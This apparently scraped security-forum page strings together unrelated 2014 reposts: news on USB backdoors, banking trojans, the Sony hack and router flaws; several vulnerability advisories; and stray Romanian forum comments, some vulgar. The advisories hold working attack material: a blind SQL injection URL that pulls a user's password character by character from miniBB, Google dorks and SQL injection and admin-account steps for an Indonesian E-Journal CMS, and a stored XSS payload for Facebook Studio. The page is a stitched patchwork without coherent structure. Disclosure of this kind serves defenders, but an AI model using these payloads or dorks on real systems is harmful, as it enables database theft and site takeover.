Aerosol

# Exploit Title: miniBB 3.1 Blind SQL Injection # Date: 23-11-2014 # Software Link: http://www.minibb.com/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # CVE: CVE-2014-9254 # Category: webapps 1. Description preg_match() only check if $_GET['code'] contains at least one letter or digit (missing ^ and $ inside regexp). File: bb_func_unsub.php $usrid=(isset($_GET['usrid'])?$_GET['usrid']+0:0); $allowUnsub=FALSE; $chkCode=FALSE; if(isset($_GET['code']) and preg_match("#[a-zA-Z0-9]+#", $_GET['code'])){ //trying to unsubscribe directly from email $chkField='email_code'; $chkVal=$_GET['code']; $userCondition=TRUE; $chkCode=TRUE; } else{ //manual unsubsribe $chkField='user_id'; $chkVal=$user_id; $userCondition=($usrid==$user_id); } if ($topic!=0 and $usrid>0 and $userCondition and $ids=db_simpleSelect(0, $Ts, 'id, user_id', 'topic_id', '=', $topic, '', '', $chkField, '=', $chkVal)) http://security.szurek.pl/minibb-31-blind-sql-injection.html 2. Proof of Concept http://minibb-url/index.php?action=unsubscribe&usrid=1&topic=1&code=test' UNION SELECT 1, IF(substr(user_password,1,1) = CHAR(99), SLEEP(5), 0) FROM minibbtable_users WHERE user_id = 1 AND username != ' This SQL will check if first password character user ID=1 is c. If yes, it will sleep 5 seconds. 3. Solution: http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html Source

Hostinger

Frate comunismul nu a disparut niciodata doar a fost "ascuns"... cuvantul "PRIVAT" nu isi are loc aici...

Samy Kamkar has a special talent for turning seemingly innocuous things into rather terrifying attack tools. First it was an inexpensive drone that Kamkar turned into a flying hacking platform with his Skyjack research, and now it’s a $20 USB microcontroller that Kamkar has loaded with code that can install a backdoor on a target machine in a few seconds and hand control of it to the attacker. Kamkar has been working on the new project for some time, looking for a way to install the backdoor without needing to use the mouse and keyboard. The solution he came up with is elegant, fast and effective. By using code that can emulate the keyboard and the mouse and evade the security protections such as local firewalls, Kamkar found a method to install his backdoor in just a couple of seconds and keep it hidden on the machine. He loaded the code onto an inexpensive Teensy USB microcontroller. Kamkar said the stickiest problem with the whole thing was figuring out how to move various windows around on the screen without the mouse. “The fun applications are when you can mount an attack pretty simply,” Kamkar said in an interview. “In general, it’s a pretty simple attack. Figuring out how to move things took the most time.” The USBdriveby attack Kamkar devised is somewhat similar to the work done by Karsten Nohl and Jacob Lell on the BadUSB attack. But Kamkar said he had done nearly all of the work on his code before Nohl and Lell disclosed their findings at Black Hat this summer. “Karsten’s attack is much more sophisticated. He’s rewriting the flash memory on the USB,” Kamkar said. “The way he’s adjusting the network preferences is by emulating a network device.” In both cases, the attack takes advantage of the trust that computers have in any USB device that’s inserted. Kamkar’s USBdriveby attack can be executed in a matter of seconds and would be quite difficult for a typical user to detect once it’s executed. In a demo video, Kamkar runs the attack on OS X, but he said the code, which he’s released on GitHub, can be modified easily to run on Windows or Linux machine. The attack inserts a backdoor on the target machine and also overwrites the DNS settings so that the attacker can then spoof various destinations, such as Facebook or an online banking site, and collect usernames and passwords. The backdoor also goes into the cron queue, so that it runs at specified intervals. “In the video, I slow it down quite a bit, but it could be done in a few seconds. The terminal backdoor could be done in a second. You don’t want to send more than sixty characters a second. To an average user, I don’t think they’d find it. You could look in the cron tab and find the backdoor. But if someone modifies it, then maybe not,” he said. A forensics person would find it, but I don’t know if I’d even notice if you did it to my machine.” Kamkar is hopeful that other researchers will look at his code and build on it, looking for other uses for it. “It would be cool if people came up with different attack vectors, maybe have it read an address book or something, especially if they can escalate privileges,” he said. “A lot of people don’t think that it will work if they’re not logged in as an admin. But all I need to do is plant this, and it’s still listening. So if you go in as a normal user and escalate privileges to admin, then I have that.” Source

SECURITY RESEARCHERS are making use of quantum physics to create fraud-proof credit cards. Called Quantum-Secure Authentication (QSA), the technology means hackers cannot determine what the information is. It centres on single particles of light, or photons, and their ability to encode data and exploits a property of photons that allows them to effectively be in multiple places at once, a phenomenon described in quantum physics. "We experimentally demonstrate quantum-secure authentication (QSA) of a classical multiple-scattering key. The key is authenticated by illuminating it with a light pulse containing fewer photons than spatial degrees of freedom and verifying the spatial shape of the reflected light," explained the researchers in an Optica journal. Quantum-physical principles forbid an attacker from beign able to discern the incident light pulse so that they cannot emulate the key by digitally constructing the expected optical response, even if all information about the key is publicly known. The researchers explained that QSA uses a key that cannot be copied due to "technological limitations" and is also secure against digital emulation. It also does not depend on secrecy of stored data, nor upon unproven mathematical assumptions, being relatively simple to implement with current technology, the security experts claimed. Malwarebytes's head of malware intelligence, Adam Kujawa, said that while the Database could be hacked and the pairs could be stolen, the keys would not be in a form that could be digitally reproduced and therefore, virtually useless to the attacker. "The problem is that even if the attacker were to obtain a correct challenge response, for a single challenge, it would be impossible for them to recreate that response in a way that would authenticate due to the properties of Quantum Physics," Kujawa said. "In addition, they would need to know that the challenge response would be used again in a lock that has dynamically generated keyholes." Kujawa explained that the amount of effort required to ensure that any key would make it through authentication for a single QSA would require numerous tries and having access to both the client and server, something like that would throw flags faster than a working key could be calculated. "Authentication at that point would be impossible," he added, suggesting that this technology could mean a future of truly secure data. Source

The latest evolution of the online bank account raiding Trojan ZeuS is the webcam-spying Chthonic malware, according to researchers. Chthonic infects Windows PCs, and allows criminals to connect to the compromised PC remotely and command it to carry out fraudulent transactions. The software nasty is targeting customers of more than 150 banks and 20 payment systems in 15 countries. Financial institutions in the UK, Spain, the US, Russia, Japan and Italy are among the most heavily targeted banks. Security researchers at Kaspersky Lab save the theftware is an evolution of ZeuS. Chthonic’s main weapon is web injectors: it inserts its own malicious JavaScript code and images into an online bank's pages when fetched by the web browser on an owned Windows PC. These modifications intercept the victim’s phone number, one-time passwords and PINs, and any other sensitive information typed in by the user, and sends it off to fraudsters. In the case of one of the Japanese banks targeted, Chthonic was able to hide the bank’s warnings about malware, and instead inject a script that allows attackers to carry out various transactions using the victim’s account. Elsewhere, affected customers of Russian banks are greeted by a completely fraudulent banking site as soon as they enter their login details. The trojan creates an iFrame with a counterfeit copy of the website that has the same size as the original window. Fortunately, many code fragments used by Chthonic to perform web injections can no longer be used, because banks have changed the structure of their pages and in some cases, the domains as well. Victims are infected through web links or by email attachments carrying a booby-trapped document that exploits a bug in Microsoft's Word software to execute malicious code. “The attachment contains a specially crafted RTF document, designed to exploit the CVE-2014-1761 vulnerability in Microsoft Office products,” Kaspersky Lab explains. Once downloaded and running, the malicious code, which contains an encrypted configuration file, injects itself into a msiexec process, and a number of malicious modules are unpacked and installed on the machines. Analysis is ongoing, but so far Kaspersky Lab researchers have discovered modules that can collect system information, steal saved passwords, log keystrokes, enable remote access, and record video and sound through any installed web camera and microphone. “The discovery of Chthonic confirms that the ZeuS Trojan is still actively evolving,” said Yury Namestnikov, senior malware analyst at Kaspersky Lab and one of the researchers who investigated the threat. “Malware writers are making full use of the latest techniques, helped considerably by the leak of the ZeuS source code.” “Chthonic is the next phase in the evolution of ZeuS. It uses Zeus AES encryption, a virtual machine similar to that used by ZeusVM and KINS, and the Andromeda downloader – to target ever more financial institutions and innocent customers in ever more sophisticated ways,’ he added. Namestnikov warned that more new variants of ZeuS are likely. More technical details on Chthonic can be found in a post on Kaspersky’s official Securelist blog here. Source

A dispute has arisen about the seriousness of a vulnerability in Linux, dubbed "Grinch", that supposedly creates a privilege escalation risk. The flaw resides in the Linux authorisation system, which can unintentionally allow privilege escalation, granting a user “root", or full administrative, access. “With full root access, an attacker would be able to completely control a system, including the ability to install programs, read data, and use the machine as a launching point for compromising other systems,” Alert Logic warns. Alert Logic warns that the “grinch”1 bug impacts all Linux platforms, including mobile devices. Alert Logic admits it has NOT seen any exploits that harness this vulnerability. Other security firms believe Alert Logic is overstating the risk, which Trend Micro characterises as “limited”. The scope of this vulnerability is very limited. Grinch is not remotely exploitable; it requires that an attacker have physical access the server they want to attack. In addition, the attacker must already have access to an account in the wheels group (i.e., already have elevated privileges as local administrators), polkit [toolkit for privilege authorisation] must be installed, and the PackageKit package management system must be in use. The barriers to exploitation are significant; in a very real way to exploit this flaw you must already have very high levels of access, making exploiting this “vulnerability” unnecessary. SANS describes it as more a “common overly permissive configuration of many Linux systems”. Red Hat dismisses the flaw entirely as “expected behavior“. An independent researcher first posted about the vulnerability – which he called PackageKit Privilege Escalation – almost a month ago before Alert Logic picked up on the threat and publicised it. ® Bootnote 1The bug was named after the famous Dr Seuss character, since it supposedly carries the potential to ruin the season of network administrators. Source

US software giant Microsoft is suing alleged scammers who phone people pretending to represent the firm and offer bogus technology support. The callers ask to take over a home computer and demand money to fix it. Some then install viruses as well. The software company said it had received more than 65,000 complaints about tech support scams since May. It is taking legal action against several firms it accuses of misusing its name in such cases. Fake ads The scam has been around for decades with callers peddling useless security software and tricking people into spending hundreds of pounds (or dollars) to solve non-existent computer problems. Increasingly, the bogus technicians are gaining access to people's computers remotely. From there they can also steal personal and financial information and install malware. In some cases people are tricked into signing up for support via fake web ads. Others receive a direct telephone call from a technician claiming to represent Microsoft. Microsoft has warned that scammers are likely to be active over the Christmas period. "The holiday season is a popular time for scammers as more people engage in online activities, including shopping, donating to charity and searching for travel deals," it said. Older victims Older people needed to be particularly vigilant, it said. "Tech support scammers don't discriminate; they will go after anyone, but not surprisingly senior citizens have been among the most vulnerable." The US Federal Trade Commission filed a legal case in Florida last month against a company that used adverts to scare people into believing their computer had a virus and then sell them allegedly worthless services. In the UK Trading Standards has recently taken legal action against a man from Luton who hired people at an Indian call centre to falsely tell people their computers had a serious problem. Mohammed Khalid Jamil was given a four-month suspended jail sentence and ordered to pay £5,665 compensation and £13,929 in prosecution costs. Microsoft has issued tips to help users avoid falling for such scams. It says: Ask if there is a fee or subscription for the services. If there is, hang up Never give control of your computer to the third party unless you can confirm it is a legitimate representative of a computer support team at a company of which you are already a customer Take the caller's information down and immediately report it to your local authorities Never provide your credit card or financial information to someone claiming to be from Microsoft tech support. Source

man am citit si asta reiese din prima parte in fine, sunt pe linux o sa le ia ceva timp sa imi gaseasca cmd-ul ) edit: https://rstforums.com/forum/94061-mo-cr-ciun-ne-aduce-calul-troian-securismul-cibernetic.rst acum am inteles tot.

Sunt si din RO probabil... scopul? vezi ce fac altii

tocmai asta au zis coaie, NU MAI AU NEVOIE DE MANDAT.

Nu bre, au voie sa iti controleze prin pc ( sa caute poze cu tine si iubita in ipostaze intime de exemplu) nu mai au nevoie de mandat, preactic spionare legala.

Buna si bine ai venit!

Inca o data guvernul a dat "mue" oamenilor cu o lege stupid de idioata... Oricum, noroc ca nu sunt pregatiti din punct de vedere tehnic ( cum spune si @Nytro ) (o sa ii il urmareasca pe vecinu' Costica cum se labareste pe brazzers...) Muie antena 3

The United States government is expected to attribute the damaging and embarrassing hack of Sony Pictures Entertainment to the government of North Korea. Various mainstream media outlets quoting anonymous government sources said North Korea is “centrally involved” in the attack, which NBC News said was carried out by hackers outside the isolated country on the orders of the North Korean government. It’s unknown what evidence the U.S. government has linking the Sony hack to North Korea, nor how said evidence was obtained. It’s likely the U.S. won’t give much in the way of details in this regard without sharing insight into what are likely classified activities, security experts said. Another big unknown is how the U.S. will respond against a nation already under heavy economic sanctions. The Washington Post reports the White House has not determined a course of action, which will delay a public announcement. The public narrative in terms of motivation has been the Sony-produced comedy movie The Interview which depicts a plot to assassinate North Korean leader Kim Jong Un. A North Korean spokesman called the movie a “blatant act of terrorism and war,” leading to initial speculation the country was behind the attack on Sony, which yesterday canceled the movie’s scheduled Christmas Day release. Sony’s announcement came after leading theater chains said they would not run the movie after threats from the Guardians of Peace hacker group claiming responsibility for the hacks, which said that it would generate a 9/11-style response against the premiere and theaters showing the movie. The movie, however, could be a massive red herring. The attackers not only allegedly made off with terabytes of data that included private emails from top executives and celebrities, but also intellectual property ranging from unreleased movies made available for download, to scripts of upcoming potential blockbusters put online, in addition to employees’ personal information. They also covered their tracks by unleashing wiper malware that overwrote hard drives company-wide, malware that was also used in the DarkSeoul attacks in South Korea that were attributed to the North, as well as the Saudi Aramco Shamoon attacks attributed to Iran. Could this just be a rogue country demonstrating its capabilities and proving that it can operate on a somewhat level playing field with a world power? “It’s not about a movie or even Sony, at all,” wrote Immunity CEO and former NSA scientist Dave Aitel on the Daily Dave mailing list. “When you build a nuclear program, you have to explode at least one warhead so that other countries see that you can do it. The same is true with Cyber.” Aitel was one of the first to publicly theorize that North Korea was behind the Sony hack and likened it to Iran’s alleged involvement in the Shamoon attacks that destroyed 30,000 workstations at the Saudi state-run oil manufacture. “Iran did this exact same near-mortal blow to Saudi Aramco, as a way of demonstrating that they could and would,” Aitel said. “That’s what just happened to Sony, but they didn’t see it in time, and didn’t realize they were going to have to fold. If you recognize the signature of this kind of nation-state attack, it is not hard to see ahead of time what is going to happen. “Clearly, not all hacking (even very impactful hacking) by random hacker groups is war/terrorism,” Aitel continued. “But when a nation state decides to take out a business in another country, it’s hard for our policy team to find another word for it.” While attribution is difficult in any hack, analysis of the Destover wiper malware has been conclusive in linking it to the three most public, destructive attacks on record. Kaspersky Lab senior researcher Kurt Baumgartner published a report on Dec. 4 analyzing the similarities in the Shamoon, DarkSeoul and Sony hacks. Across the three attacks, Baumgartner notes the use of commercially available Eldos RawDisk driver files (Shamoon and Destover), that wiper drivers are maintained in the dropper’s resource section (Shamoon, Destover), and disk data and the master boot record are overwritten with encoded political messages (Shamoon, DarkSeoul). “In all three cases: Shamoon, DarkSeoul and Destover, the groups claiming credit for their destructive impact across entire large networks had no history or real identity of their own,” Baumgartner wrote in a report published on Securelist. “All attempted to disappear following their act, did not make clear statements but did make bizarre and roundabout accusations of criminal conduct, and instigated their destructive acts immediately after a politically-charged event that was suggested as having been at the heart of the matter.” Cisco’s Talos research team published its own report yesterday, warning future victims that backup is an essential protective measure in such attacks. The Talos report dives into the technical aspects of wiper malware and how to detect it. Source

More than 12 million devices running an embedded webserver called RomPager are vulnerable to a simple attack that could give a hacker man-in-the-middle position on traffic going to and from home routers from just about every leading manufacturer. Mostly ISP-owned residential gateways manufactured by D-Link, Huawei, TP-Link, ZTE, Zyxel and several others are currently exposed. Researchers at Check Point Software Technologies reported the flaw they’ve called Misfortune Cookie, to all of the affected vendors and manufacturers, and most have responded that they will push new firmware and patches in short order. The problem with embedded device security is that, with consumer-owned gear especially, it’s up to the device owner to find and flash new firmware, leaving most of the devices in question vulnerable indefinitely. In the case of the RomPager vulnerability, an attacker need only send a single packet containing a malicious HTTP cookie to exploit the flaw. Such an exploit would corrupt memory on the device and allow an attacker to remotely gain administrative access to the device. “We hope this is a game-changing wake-up call,” said Shahar Tal, malware and vulnerability research manager with Check Point. “Certainly in terms of numbers, I don’t remember a vulnerability released that had 12 million endpoints online since maybe Conficker in 2008. This is really, really bad and the incredibly slow update propagation chain makes it worse.” Tal said the vulnerable code was written in 2002 and given to chipset makers bundled in a software development kit (SDK). This SDK was given to manufacturers who used it when building their respective firmware; ISPs, Tal said, also used the same SDK to prepare custom firmware used in consumer residential devices. “The vulnerable code is from 2002 and was actually fixed in 2005 [by AllegroSoft, makers of RomPager] and yet still did not make it into consumer devices,” Tal said. “It’s present in device firmware manufactured in 2014 that we downloaded last month. This is an industry problem; something is wrong.” Tal said Check Point conducted Internet scans that show the 12 million devices exposed online in 189 countries. In some of those countries, Tal said, vulnerability rates hover around 10 percent, and in one country half of its Internet users are at risk. “Even when people become aware of this, I don’t expect updated firmware to be deployed in 189 countries,” Tal said. “This will be with us for months and years to come.” That means that vulnerable home routers are at risk to remote attacks that put not only Internet traffic at risk, but also other devices on a local network such as printers. “The implications of these risks mean more than just a privacy violation – they also set the stage for further attacks, such as installing malware on devices and making permanent configuration changes,” Check Point wrote in an analysis published today. “This WAN-to-LAN free-crossing is also bypassing any firewall or isolation functionality previously provided by your gateway and breaks common threat models. For example, an attacker can try to access your home webcam (potentially using default credentials) or extract data from your business NAS backup drive.” Tal said Check Point is not aware of any exploits of this issue, but assumes that researchers and black hats will soon begin pinging Shodan and doing Google searches looking for vulnerable devices. “This is very easy to exploit once you figure out the program internals,” Tal said. “We are assuming that some researchers will do that in upcoming days and we hope vendors react as fast as possible to get consumers protected.” Some vendors, which Tal would not name, have already shared beta versions of upgraded firmware with Check Point, and Check Point has confirmed the issue as patched in those cases. “Everyone is aware that embedded devices are insecure, but we haven’t had one game-changing event that crosses boundaries and makes the industry understand this,” Tal said. “This one is definitely worth the attention and needs fixing.” Source

Document Title: =============== E-Journal CMS (ID) - Multiple Web Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1380 Release Date: ============= 2014-12-17 Vulnerability Laboratory ID (VL-ID): ==================================== 1380 Common Vulnerability Scoring System: ==================================== 7 Product & Service Introduction: =============================== http://simlitabmas.dikti.go.id/ejournal/ Abstract Advisory Information: ============================== An independent Vulnerability Laboratory Researcher discovered multiple vulnerabilities in the indonesian E-Journal web-application. Vulnerability Disclosure Timeline: ================================== 2013-12-17: Public Disclosure Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ 1.1 A sql injection web vulnerability has been discovered in the official E-Journal (ID) content management system. The vulnerability allows remote attackers to execute own sql commands by usage of a vulnerable serivce value. The vulnerability is located in the id value of the jurnal.php file. Remote attackers are able to execute own sql commands by usage of a GET method request with manipulated id value. Remote attackers are able to read database information by execution of own sql commands. The vulnerability is located in the client-side and the request method to execute sql commands is GET. The security risk of the sql vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.0. Exploitation of the sql injection web vulnerability does not require a privileged application user account or user interaction. Successful exploitation of the remote vulnerability results in database management system and web-application compromise. Request Method(s): [+] GET Vulnerable Module(s): [+] jurnal Vulnerable File(s): [+] jurnal.php Vulnerable Parameter(s): [+] id 1.2 A privilege escalation vulnerability has been discovered in the official E-Journal (ID) content management system. The vulnerability allows an attacker to escalate of the restricted privileges, to gain for example higher access controls. The privilege escalation vulnerability is located in tambah value of the URL input in the data.php file. Remote attackers can switch the menu to escalte with privileges by adding a new administrator account. The vulnerability is located on the application-side and the request method to inject is POST. The security risk of the privilege escalation vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. Exploitation of the privilege escalation web vulnerability requires a low privileged application user account and no user interaction. Successful exploitation of the remote vulnerability results in information leaking, database management system- and web-application -compromise. Request Method(s): [+] POST Vulnerable Module(s): [+] URL Vulnerable File(s): [+] data.php Vulnerable Parameter(s): [+] tambah Proof of Concept (PoC): ======================= The vulnerabilities can be exploited by remote attackers without privileged application user account and user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Dork(s): inurl:mahasiswa.php intitle:E-Journal inurl:dosen.php intitle:E-Journal inurl:jurnal.php intitle:E-Journal inurl:dokumen.php intitle:E-Journal "Karya Tulis Mahasiswa" intitle:E-Journal "Design & Programming by" intitle:E-Journal "E-Journal adalah aplikasi berbasis web untuk" Or use your own Google Dorks Note: This E-Journal CMS has 2 versions, The Old Version doesn't have informasi.php (Informasi Menu). 1.1 POC#1: SQL Injection http://[Site]/[Path]/jurnal.php?detail=jurnal&id=-'[SQL-INJECTION VULNERABILITY]-- Reference Url(s): http://e-journal.xxx.ac.id/jurnal.php?detail=jurnal&id='133[SQL-INJECTION VULNERABILITY]-- http://www.ejournal-xxx.com/jurnal.php?detail=jurnal&id='133[SQL-INJECTION VULNERABILITY]-- http://e-journal.xxx.ac.id/jurnal.php?detail=jurnal&id='133[SQL-INJECTION VULNERABILITY]-- http://ejurnal.xxx.ac.id/jurnal.php?detail=jurnal&id='133[SQL-INJECTION VULNERABILITY]-- http://ejournal.xxx.ac.id/jurnal.php?detail=jurnal&id='133[SQL-INJECTION VULNERABILITY]-- 1.2 PoC#2: Privilege Escalation You can create a new administrator account by usage of the following trick. For Example my Target url is : http://www.ejournal-xxx.com/ Step1: Add data.php?tambah=dosen in the URL. So in this case the URL was http://www.ejournal-xxx.com/data.php?tambah=dosen Step2: Then you can see this notice : "ANDA TIDAK BERHAK MENGAKSES HALAMAN INI. SILAHKAN ANDA LOGIN SEBAGAI ADMINISTRATOR". Ignore that Notice and click Admin Menu. Screenshot #1 : http://i59.tinypic.com/54he2b.png Step3: Successful exploited! Now you can add an Administrator Account. Screenshot #2 : http://i59.tinypic.com/2i8vyus.png Solution - Fix & Patch: ======================= 1.1 The vulnerability can be patched by usage of a prepared statement. Encode and parse the vulnerable id value in the jurnal.php file to prevent sql injection attacks. 1.2 Restrict the URL parameter input to prevent unauthorized account adds. Parse the URL value and encode the input restrict the url to a local source. Security Risk: ============== 1.1 The security risk of the remote sql injection web vulnerability in the e-journal application is estimated as high. (CVSS 7.0) 1.2 The security risk of the privilege escalation web vulnerability in the URL parameter is estimated as high. (CVSS 6.9) Credits & Authors: ================== X-Cisadane - Stefanus (steevee.aka@gmail.com) Greetz to: X-Code YogyaFree, Explore Crew, CodeNesia, Bogor Hackers Community, Tomi Zaoldyeck and Winda Utari Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source

WordPress iTwitter 0.04 Cross Site Request Forgery / Cross Site Scripting WordPress PictoBrowser 0.3.1 CSRF / XSS WordPress Twitter 0.7 CSRF / XSS WordPress PWG Random 1.11 CSRF / XSS WordPress gSlideShow 0.1 CSRF / XSS WordPress SimpleFlickr 3.0.3 CSRF / XSS WordPress twimp-wp Cross Site Request Forgery / Cross Site Scripting WordPress Simplelife 1.2 CSRF / XSS ? Packet Storm WordPress Twitter LiveBlog 1.1.2 CSRF / XSS WordPress TweetScribe 1.1 CSRF / XSS WordPress WP Limit Posts Automatically 0.7 CSRF / XSS WordPress WP Unique Article Header Image 1.0 CSRF / XSS

Document Title: =============== Facebook Bug Bounty #16 (Studio) - Persistent Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1368 Facebook Security ID: 219162244 Release Date: ============= 2014-12-10 Vulnerability Laboratory ID (VL-ID): ==================================== 1368 Common Vulnerability Scoring System: ==================================== 3.5 Product & Service Introduction: =============================== Facebook is an online social networking service, whose name stems from the colloquial name for the book given to students at the start of the academic year by some university administrations in the United States to help students get to know each other. It was founded in February 2004 by Mark Zuckerberg with his college roommates and fellow Harvard University students Eduardo Saverin, Andrew McCollum, Dustin Moskovitz and Chris Hughes. The website`s membership was initially limited by the founders to Harvard students, but was expanded to other colleges in the Boston area, the Ivy League, and Stanford University. It gradually added support for students at various other universities before opening to high school students, and eventually to anyone aged 13 and over. Facebook now allows any users who declare themselves to be at least 13 years old to become registered users of the site. Users must register before using the site, after which they may create a personal profile, add other users as friends, and exchange messages, including automatic notifications when they update their profile. Additionally, users may join common-interest user groups, organized by workplace, school or college, or other characteristics, and categorize their friends into lists such as `People From Work` or `Close Friends`. As of September 2012, Facebook has over one billion active users, of which 8.7% are fake. According to a May 2011 Consumer Reports survey, there are 7.5 million children under 13 with accounts and 5 million under 10, violating the site`s terms of service. In May 2005, Accel partners invested $12.7 million in Facebook, and Jim Breyer added $1 million of his own money to the pot. A January 2009 Compete.com study ranked Facebook as the most used social networking service by worldwide monthly active users. Entertainment Weekly included the site on its end-of-the-decade `best-of` list, saying, `How on earth did we stalk our exes, remember our co-workers` birthdays, bug our friends, and play a rousing game of Scrabulous before Facebook?` Facebook eventually filed for an initial public offering on February 1, 2012, and was headquartered in Menlo Park, California. Facebook Inc. began selling stock to the public and trading on the NASDAQ on May 18, 2012. Based on its 2012 income of USD 5.1 Billion, Facebook joined the Fortune 500 list for the first time, being placed at position of 462 on the list published in 2013. (Copy of the Homepage: http://en.wikipedia.org/wiki/Facebook ) Abstract Advisory Information: ============================== An independent Vulnerability Laboratory Researcher discovered a persistent input validation web vulnerability in the official Facebook Studio web-application. Vulnerability Disclosure Timeline: ================================== 2014-12-10: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Facebook Product: Studio Service - Web Application 2014 Q4 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official Facebook Studio online-service web-application. The vulnerability allows remote attackers to inject malicious script codes on the application-side to compromise the online-service application. The vulnerability is located in the dashboard module of the facebook studio service. Remote attackers are able to inject own script codes to the mobile client of facebook. After the inject of the payload the attacker can visit the dashboard service to execute the script codes. The vulnerability was disclosed during a pentest of the htmlentities on fb mobile client to the facebook studio service. The attack vector of the issue is persistent and the request method to inject is POST. The security risk of the persistent vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. Exploitation of the persistent security vulnerability requires a low privileged web-application user account and medium user interaction. Successful exploitation of the vulnerability results in persistent phishing attacks, persistent session hijacking attacks, persistent external redirect to malicious sources and application-side manipulation of affected or connected module context. Request Method(s): [+] POST Vulnerable Module(s): Input [+] https://m.facebook.com/editprofile.php?type=contact&edit=website&refid=17 Affected Module(s): Output [+] https://www.facebook-studio.com/dashboard#_=_ Proof of Concept (PoC): ======================= Exploiting this bug is a first order injection in facebook mobile (m.facebook.com for firefox) that will result xss in the studio. Manual steps to reproduce the vulnerability ... 1. Open the following fb mobile webpage https://m.facebook.com/editprofile.php?type=contact&edit=website&refid=17 Note: (using Firefox) 2. Then remove all the URLs you have (if you have any) 3. Add for example "https://somethinag.com/"onmouseover="alert(31337);*." (without the quotes) 4. After that surf to https://www.facebook-studio.com/dashboard#_=_ and you will have your stored XSS. Note: Facebook didnt use htmlentity to the url when processing to add it in the database. When-ever being rendered, it wont be a second-order-injection. 5. Successful reproduce of the vulnerability! The full payload you need to add to your website is ... PoC: https://url-source.com/"style="font-size:900px;"onmouseover="alert(31337);*. Note: The full payload you need to add to your website is listed above. Solution - Fix & Patch: ======================= Issue has already been patched by the facebook developer team during the participate in the official bug bounty program. Security Risk: ============== The security risk of the persistent input validation web vulnerability in the facebook studio website is estimated as medium. (CVSS 3.5) Credits & Authors: ================== Paulos Yibelo Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source

